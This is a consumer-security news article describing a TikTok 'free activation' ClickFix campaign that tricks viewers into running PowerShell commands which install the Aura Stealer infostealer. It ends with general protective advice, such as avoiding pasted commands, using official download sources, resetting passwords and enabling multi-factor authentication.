Cybercriminals Exploit TikTok with Malware Disguised as Free Software

Cybercriminals are increasingly targeting TikTok users with a deceptive scheme that presents malware as free activation guides for popular software. The scams involve fake videos claiming to enable users to access programs like Windows, Microsoft 365, Photoshop, as well as phony versions of Netflix and Spotify Premium. Security expert Xavier Mertens first identified this malicious campaign, noting its similarity to prior scams earlier this year.

According to a report by BleepingComputer, these fraudulent TikTok videos showcase brief PowerShell commands designed to trick viewers into executing them as administrators. What appears to be a simple method to “activate” or “fix” software instead connects users to a harmful website that downloads malware known as Aura Stealer. This malware quietly extracts sensitive information, including saved passwords, cookies, cryptocurrency wallets, and authentication tokens from the victim’s computer.

Understanding the Mechanism of the Scam

The campaign employs a technique referred to as a ClickFix attack, a form of social engineering that deceives victims into believing they are following legitimate technical guidelines. The instructions are deceptively straightforward: execute a short command to gain immediate access to premium software. However, the PowerShell command redirects users to a remote domain named slmgr[.]win, which facilitates the download of harmful executables from pages hosted by Cloudflare.

The primary file involved, updater.exe, is a variant of the Aura Stealer malware. Once it infiltrates a system, it seeks out user credentials and transmits them back to the attackers. Another component, source.exe, utilizes Microsoft’s C# compiler to execute code directly in memory, making detection even more challenging. While the specific purpose of this additional payload remains unclear, its pattern is consistent with previous malware used for cryptocurrency theft and ransomware delivery.

Protecting Yourself Against TikTok Malware Scams

Despite the convincing nature of these scams, individuals can take essential precautions to avoid falling victim. Here are several recommendations:

1. **Avoid Shortcuts**: Never copy or execute PowerShell commands from TikTok videos or unverified websites. Free access to premium software often signals a scam.

2. **Use Trusted Sources**: Always download software directly from official websites or legitimate app stores.

3. **Keep Security Tools Updated**: Outdated antivirus software or browsers may fail to recognize the latest threats. Regularly updating your software is crucial for staying protected.

4. **Install Strong Antivirus Software**: Robust antivirus solutions offer real-time scanning and protection against trojans, information stealers, and phishing attempts. These tools can also alert users to suspicious links that could compromise personal information.

5. **Consider a Data Removal Service**: If personal data is compromised, a monitoring service can notify you and assist in removing sensitive information from the internet. While no service can guarantee complete removal, they help minimize your online presence, making it harder for scammers to target you.

6. **Reset Credentials**: If you have followed questionable instructions or entered credentials after viewing a “free activation” video, reset all passwords immediately, focusing first on email, financial, and social media accounts.

7. **Use Unique Passwords**: Employ different passwords for each site and consider using a password manager, which securely stores and generates complex passwords.

8. **Enable Multi-Factor Authentication**: Adding an extra layer of security can prevent unauthorized access even if passwords are stolen.

The global reach of TikTok makes it a prime target for scams, where what appears to be helpful advice can jeopardize personal security and financial well-being. Users should remain vigilant, trust only verified sources, and understand that legitimate software activations do not come without risk.